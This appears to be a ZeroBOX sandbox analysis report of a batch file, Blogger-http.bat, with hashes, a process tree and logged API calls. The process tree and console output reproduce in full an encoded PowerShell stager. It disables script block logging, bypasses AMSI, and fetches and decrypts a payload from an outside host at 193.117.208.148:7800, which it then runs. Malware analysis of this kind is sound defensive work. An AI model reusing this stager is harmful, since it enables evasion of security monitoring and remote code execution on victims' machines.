Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 12, 2024, 9:43 a.m.	Aug. 12, 2024, 9:46 a.m.

Size	5.0KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`760e4992b9a2f60c53b67becaf62f157`
SHA256	`0edbda426b67bd9bd51fb2c9354d15ea1dc1589642deae3d9a8a64e4f55a9815`
CRC32	`D6E323B5`
ssdeep	`96:7X6Zrp4mnkjZAH93iQgs0T/E6bIEJwhc7KxJwOsDDiaTYG64K+SIxTiW9gTc4ESK:z6Z6mnpEsGqhcW7wOkTtNpSIxTiLGSK`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "lrAUN" C:\Users\test22\AppData\Local\Temp\Blogger-http.bat
3044
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\Blogger-http.bat
  2196
  - powershell.exe powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAcwBJAE8AbgBUAGEAYgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAE8AUgAgAC0ARwBlACAAMwApAHsAJAA4ADIAMgA9AFsAUgBlAGYAXQAuAEEAcwBzAEUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkARQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJAA4ADIAMgApAHsAJAAxADkAMQA9ACQAOAAyADIALgBHAGUAVABWAEEATABVAGUAKAAkAG4AVQBMAEwAKQA7AEkARgAoACQAMQA5ADEAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAAxADkAMQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAAxADkAMQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBMAD0AWwBDAE8ATABMAEUAYwB0AGkATwBuAFMALgBHAEUAbgBFAHIAaQBDAC4ARABJAGMAdABJAE8ATgBBAHIAWQBbAFMAdABSAEkATgBHACwAUwBZAHMAdABlAG0ALgBPAEIAagBlAGMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAdgBBAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAGwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAAxADkAMQBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEAbAB9AEUAbABzAGUAewBbAFMAQwBSAGkAcABUAEIATABvAEMAawBdAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAGwAVQBlACgAJABuAFUATABMACwAKABOAEUAVwAtAE8AYgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABJAG8AbgBTAC4ARwBlAG4ARQBSAEkAYwAuAEgAYQBTAGgAUwBlAFQAWwBzAFQAcgBJAE4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBmAF0ALgBBAFMAUwBFAG0AQgBsAHkALgBHAGUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQB0AEYASQBFAEwAZAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAGwAVQBFACgAJABuAFUAbABsACwAJABUAFIAdQBlACkAOwB9ADsAWwBTAFkAUwBUAGUATQAuAE4AZQBUAC4AUwBFAHIAdgBJAGMARQBQAE8ASQBuAFQATQBBAG4AQQBnAGUAcgBdADoAOgBFAFgAcABlAEMAVAAxADAAMABDAE8ATgBUAGkATgBVAGUAPQAwADsAJAA1ADYANgA9AE4ARQB3AC0ATwBCAEoAZQBDAHQAIABTAHkAcwBUAGUAbQAuAE4ARQB0AC4AVwBlAEIAQwBMAEkAZQBuAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQAZQB4AFQALgBFAE4AQwBPAEQASQBOAEcAXQA6ADoAVQBOAEkAQwBvAGQAZQAuAEcAZQBUAFMAdAByAGkAbgBHACgAWwBDAE8AbgB2AGUAUgBUAF0AOgA6AEYAcgBvAG0AQgBBAFMARQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkADUANgA2AC4ASABlAGEARABlAFIAcwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQANQA2ADYALgBQAFIATwB4AHkAPQBbAFMAeQBzAFQAZQBtAC4ATgBFAHQALgBXAGUAQgBSAGUAcQBVAEUAUwB0AF0AOgA6AEQAZQBmAGEAVQBMAFQAVwBFAGIAUAByAG8AeABZADsAJAA1ADYANgAuAFAAcgBPAHgAeQAuAEMAcgBFAGQAZQBOAFQASQBhAEwAcwAgAD0AIABbAFMAeQBTAFQAZQBNAC4ATgBFAFQALgBDAFIARQBEAGUAbgB0AGkAQQBMAEMAQQBDAGgARQBdADoAOgBEAGUARgBhAFUAbAB0AE4AZQBUAHcAbwByAEsAQwBSAEUAZABlAE4AVABJAGEATABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkADUANgA2AC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAFkAcwB0AGUATQAuAFQAZQBYAFQALgBFAG4AYwBvAEQAaQBOAEcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgBZAHQAZQBTACgAJwBvACoAUwAvAFIAdgBdAFsAWQAxAEoAWgA/ADgAcQBLADMATQBrAHQAQAA9AEIANwBsAGgAPgBDAEkALABQADIAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBOAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgBYAE8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAA1ADYANgAuAEgARQBBAEQARQByAHMALgBBAGQARAAoACIAQwBvAG8AawBpAGUAIgAsACIATQBUAGoAWQBpAEkAZQA9AHMALwBZADcAcwAvAEkAMQBaAFQAZgBEADUARQBEAEQAcABUADYANABtAEQATgBNAFQAYwBvAD0AIgApADsAJABEAGEAVABhAD0AJAA1ADYANgAuAEQAbwB3AG4AbABPAGEAZABEAGEAVABhACgAJABzAEUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQBUAGEAWwAwAC4ALgAzAF0AOwAkAEQAYQBUAEEAPQAkAEQAQQB0AGEAWwA0AC4ALgAkAEQAYQBUAGEALgBMAGUATgBnAHQAaABdADsALQBqAG8ASQBuAFsAQwBIAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAQQB0AEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA==
    2160

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
193.117.208.148	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 12, 2024, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 12, 2024, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:41 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 12, 2024, 9:41 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 12, 2024, 9:41 a.m.			0	0

Command line console output was observed (50 out of 102 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: powershell console_handle: 0x00000007	1	1
WriteConsoleW Aug. 12, 2024, 9:41 a.m.	buffer: -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAHIAcwBJAE8AbgBUAGEAYgBMAGUALgBQAFMAVgBlAFIAcwBpAG8ATgAuAE0AYQBqAE8AUgAgAC0ARwBlACAAMwApAHsAJAA4ADIAMgA9AFsAUgBlAGYAXQAuAEEAcwBzAEUAbQBCAEwAWQAuAEcAZQBUAFQAWQBQAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAGkARQBgAGwARAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApADsASQBmACgAJAA4ADIAMgApAHsAJAAxADkAMQA9ACQAOAAyADIALgBHAGUAVABWAEEATABVAGUAKAAkAG4AVQBMAEwAKQA7AEkARgAoACQAMQA5ADEAWwAnAFMAYwByAGkAcAB0AEIAJwArACcAbABvAGMAawBMAG8AZwBnAGkAbgBnACcAXQApAHsAJAAxADkAMQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0APQAwADsAJAAxADkAMQBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQA9ADAAfQAkAFYAYQBMAD0AWwBDAE8ATABMAEUAYwB0AGkATwBuAFMALgBHAEUAbgBFAHIAaQBDAC4ARABJAGMAdABJAE8ATgBBAHIAWQBbAFMAdABSAEkATgBHACwAUwBZAHMAdABlAG0ALgBPAEIAagBlAGMAdABdAF0AOgA6AE4AZQBXACgAKQA7ACQAdgBBAEwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwAsADAAKQA7ACQAVgBhAGwALgBBAEQAZAAoACcARQBuAGEAYgBsAGUAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAEkAbgB2AG8AYwBhAHQAaQBvAG4ATABvAGcAZwBpAG4AZwAnACwAMAApADsAJAAxADkAMQBbACcASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAXABTAG8AZgB0AHcAYQByAGUAXABQAG8AbABpAGMAaQBlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABQAG8AdwBlAHIAUwBoAGUAbABsAFwAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAD0AJABWAGEAbAB9AEUAbABzAGUAewBbAFMAQwBSAGkAcABUAEIATABvAEMAawBdAC4AIgBHAEUAVABGAEkARQBgAEwAZAAiACgAJwBzAGkAZwBuAGEAdAB1AHIAZQBzACcALAAnAE4AJwArACcAbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAFQAVgBhAGwAVQBlACgAJABuAFUATABMACwAKABOAEUAVwAtAE8AYgBqAEUAYwB0ACAAQwBvAEwATABFAEMAdABJAG8AbgBTAC4ARwBlAG4ARQBSAEkAYwAuAEgAYQBTAGgAUwBlAFQAWwBzAFQAcgBJAE4AZwBdACkAKQB9ACQAUgBFAEYAPQBbAFIARQBmAF0ALgBBAFMAUwBFAG0AQgBsAHkALgBHAGUAVABUAFkAcABFACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAEUARgAuAEcARQB0AEYASQBFAEwAZAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBFAHQAVgBBAGwAVQBFACgAJABuAFUAbABsACwAJABUAFIAdQBlACkAOwB9ADsAWwBTAFkAUwBUAGUATQAuAE4AZQBUAC4AUwBFAHIAdgBJAGMARQBQAE8ASQBuAFQATQBBAG4AQQBnAGUAcgBdADoAOgBFAFgAcABlAEMAVAAxADAAMABDAE8ATgBUAGkATgBVAGUAPQAwADsAJAA1ADYANgA9AE4ARQB3AC0ATwBCAEoAZQBDAHQAIABTAHkAcwBUAGUAbQAuAE4ARQB0AC4AVwBlAEIAQwBMAEkAZQBuAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJABzAGUAcgA9ACQAKABbAFQAZQB4AFQALgBFAE4AQwBPAEQASQBOAEcAXQA6ADoAVQBOAEkAQwBvAGQAZQAuAEcAZQBUAFMAdAByAGkAbgBHACgAWwBDAE8AbgB2AGUAUgBUAF0AOgA6AEYAcgBvAG0AQgBBAFMARQA2ADQAUwBUAFIAaQBOAGcAKAAnAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAZwBBAEwAZwBBAHgAQQBEAFEAQQBPAEEAQQA2AEEARABjAEEATwBBAEEAdwBBAEQAQQBBACcAKQApACkAOwAkAHQAPQAnAC8AbgBlAHcAcwAuAHAAaABwACcAOwAkADUANgA2AC4ASABlAGEARABlAFIAcwAuAEEARABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQANQA2ADYALgBQAFIATwB4AHkAPQBbAFMAeQBzAFQAZQBtAC4ATgBFAHQALgBXAGUAQgBSAGUAcQBVAEUAUwB0AF0AOgA6AEQAZQBmAGEAVQBMAFQAVwBFAGIAUAByAG8AeABZADsAJAA1ADYANgAuAFAAcgBPAHgAeQAuAEMAcgBFAGQAZQBOAFQASQBhAEwAcwAgAD0AIABbAFMAeQBTAFQAZQBNAC4ATgBFAFQALgBDAFIARQBEAGUAbgB0AGkAQQBMAEMAQQBDAGgARQBdADoAOgBEAGUARgBhAFUAbAB0AE4AZQBUAHcAbwByAEsAQwBSAEUAZABlAE4AVABJAGEATABTADsAJABTAGMAcgBpAHAAdAA6AFAAcgBvAHgAeQAgAD0AIAAkADUANgA2AC4AUAByAG8AeAB5ADsAJABLAD0AWwBTAFkAcwB0AGUATQAuAFQAZQBYAFQALgBFAG4AYwBvAEQAaQBOAEcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAQgBZAHQAZQBTACgAJwBvACoAUwAvAFIAdgBdAFsAWQAxAEoAWgA/ADgAcQBLADMATQBrAHQAQAA9AEIANwBsAGgAPgBDAEkALABQADIAJwApADsAJABSAD0AewAkAEQALAAkAEsAPQAkAEEAUgBnAHMAOwAkAFMAPQAwAC4ALgAyADUANQA7ADAALgAuADIANQA1AHwAJQB7ACQASgA9ACgAJABKACsAJABTAFsAJABfAF0AKwAkAEsAWwAkAF8AJQAkAEsALgBDAE8AdQBOAFQAXQApACUAMgA1ADYAOwAkAFMAWwAkAF8AXQAsACQAUwBbACQASgBdAD0AJABTAFsAJABKAF0ALAAkAFMAWwAkAF8AXQB9ADsAJABEAHwAJQB7ACQASQA9ACgAJABJACsAMQApACUAMgA1ADYAOwAkAEgAPQAoACQASAArACQAUwBbACQASQBdACkAJQAyADUANgA7ACQAUwBbACQASQBdACwAJABTAFsAJABIAF0APQAkAFMAWwAkAEgAXQAsACQAUwBbACQASQBdADsAJABfAC0AYgBYAE8AUgAkAFMAWwAoACQAUwBbACQASQBdACsAJABTAFsAJABIAF0AKQAlADIANQA2AF0AfQB9ADsAJAA1ADYANgAuAEgARQBBAEQARQByAHMALgBBAGQARAAoACIAQwBvAG8AawBpAGUAIgAsACIATQBUAGoAWQBpAEkAZQA9AHMALwBZADcAcwAvAEkAMQBaAFQAZgBEADUARQBEAEQAcABUADYANABtAEQATgBNAFQAYwBvAD0AIgApADsAJABEAGEAVABhAD0AJAA1ADYANgAuAEQAbwB3AG4AbABPAGEAZABEAGEAVABhACgAJABzAEUAcgArACQAdAApADsAJABpAHYAPQAkAGQAYQBUAGEAWwAwAC4ALgAzAF0AOwAkAEQAYQBUAEEAPQAkAEQAQQB0AGEAWwA0AC4ALgAkAEQAYQBUAGEALgBMAGUATgBnAHQAaABdADsALQBqAG8ASQBuAFsAQwBIAGEAUgBbAF0AXQAoACYAIAAkAFIAIAAkAEQAQQB0AEEAIAAoACQASQBWACsAJABLACkAKQB8AEkARQBYAA== console_handle: 0x00000007	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: Exception calling "DownloadData" with "1" argument(s): "Unable to connect to th console_handle: 0x00000023	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: e remote server" console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: At line:1 char:1803 console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: + If($PSVErsIOnTabLe.PSVeRsioN.MajOR -Ge 3){$822=[Ref].AssEmBLY.GeTTYPe('System console_handle: 0x00000047	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: .Management.Automation.Utils')."GEtFiE`lD"('cachedGroupPolicySettings','N'+'onP console_handle: 0x00000053	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: ublic,Static');If($822){$191=$822.GeTVALUe($nULL);IF($191['ScriptB'+'lockLoggin console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: g']){$191['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$191['Scrip console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: tB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VaL=[COLLEctiOnS.GE console_handle: 0x00000077	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: nEriC.DIctIONArY[StRING,SYstem.OBject]]::NeW();$vAL.ADd('EnableScriptB'+'lockLo console_handle: 0x00000083	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: gging',0);$Val.ADd('EnableScriptBlockInvocationLogging',0);$191['HKEY_LOCAL_MAC console_handle: 0x0000008f	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: HINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$Va console_handle: 0x0000009b	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: l}Else{[SCRipTBLoCk]."GETFIE`Ld"('signatures','N'+'onPublic,Static').SETValUe($ console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: nULL,(NEW-ObjEct CoLLECtIonS.GenERIc.HaShSeT[sTrINg]))}$REF=[REf].ASSEmBly.GeTT console_handle: 0x000000b3	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: YpE('System.Management.Automation.Amsi'+'Utils');$REF.GEtFIELd('amsiInitF'+'ail console_handle: 0x000000bf	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: ed','NonPublic,Static').SEtVAlUE($nUll,$TRue);};[SYSTeM.NeT.SErvIcEPOInTMAnAger console_handle: 0x000000cb	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: ]::EXpeCT100CONTiNUe=0;$566=NEw-OBJeCt SysTem.NEt.WeBCLIent;$u='Mozilla/5.0 (Wi console_handle: 0x000000d7	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: ndows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([TexT.ENCODING]:: console_handle: 0x000000e3	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: UNICode.GeTStrinG([COnveRT]::FromBASE64STRiNg('aAB0AHQAcAA6AC8ALwAxADkAMwAuADEA console_handle: 0x000000ef	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: MQA3AC4AMgAwADgALgAxADQAOAA6ADcAOAAwADAA')));$t='/news.php';$566.HeaDeRs.ADd('U console_handle: 0x000000fb	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: ser-Agent',$u);$566.PROxy=[SysTem.NEt.WeBReqUESt]::DefaULTWEbProxY;$566.PrOxy.C console_handle: 0x00000107	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: rEdeNTIaLs = [SySTeM.NET.CREDentiALCAChE]::DeFaUltNeTworKCREdeNTIaLS;$Script:Pr console_handle: 0x00000113	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: oxy = $566.Proxy;$K=[SYsteM.TeXT.EncoDiNG]::ASCII.GetBYteS('o*S/Rv][Y1JZ?8qK3Mk console_handle: 0x0000011f	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: t@=B7lh>CI,P2');$R={$D,$K=$ARgs;$S=0..255;0..255\|%{$J=($J+$S[$_]+$K[$_%$K.COuNT console_handle: 0x0000012b	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: ])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D\|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I console_handle: 0x00000137	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: ],$S[$H]=$S[$H],$S[$I];$_-bXOR$S[($S[$I]+$S[$H])%256]}};$566.HEADErs.AdD("Cooki console_handle: 0x00000143	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: e","MTjYiIe=s/Y7s/I1ZTfD5EDDpT64mDNMTco=");$DaTa=$566.DownlOadDaTa <<<< ($sEr+$ console_handle: 0x0000014f	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: t);$iv=$daTa[0..3];$DaTA=$DAta[4..$DaTa.LeNgth];-joIn[CHaR[]](& $R $DAtA ($IV+$ console_handle: 0x0000015b	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: K))\|IEX console_handle: 0x00000167	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x00000173	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000017f	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: Cannot index into a null array. console_handle: 0x0000019f	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: At line:1 char:1823 console_handle: 0x000001ab	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: + If($PSVErsIOnTabLe.PSVeRsioN.MajOR -Ge 3){$822=[Ref].AssEmBLY.GeTTYPe('System console_handle: 0x000001b7	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: .Management.Automation.Utils')."GEtFiE`lD"('cachedGroupPolicySettings','N'+'onP console_handle: 0x000001c3	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: ublic,Static');If($822){$191=$822.GeTVALUe($nULL);IF($191['ScriptB'+'lockLoggin console_handle: 0x000001cf	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: g']){$191['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$191['Scrip console_handle: 0x000001db	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: tB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$VaL=[COLLEctiOnS.GE console_handle: 0x000001e7	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: nEriC.DIctIONArY[StRING,SYstem.OBject]]::NeW();$vAL.ADd('EnableScriptB'+'lockLo console_handle: 0x000001f3	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: gging',0);$Val.ADd('EnableScriptBlockInvocationLogging',0);$191['HKEY_LOCAL_MAC console_handle: 0x000001ff	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: HINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$Va console_handle: 0x0000020b	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: l}Else{[SCRipTBLoCk]."GETFIE`Ld"('signatures','N'+'onPublic,Static').SETValUe($ console_handle: 0x00000217	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: nULL,(NEW-ObjEct CoLLECtIonS.GenERIc.HaShSeT[sTrINg]))}$REF=[REf].ASSEmBly.GeTT console_handle: 0x00000223	1	1
WriteConsoleW Aug. 12, 2024, 9:42 a.m.	buffer: YpE('System.Management.Automation.Amsi'+'Utils');$REF.GEtFIELd('amsiInitF'+'ail console_handle: 0x0000022f	1	1
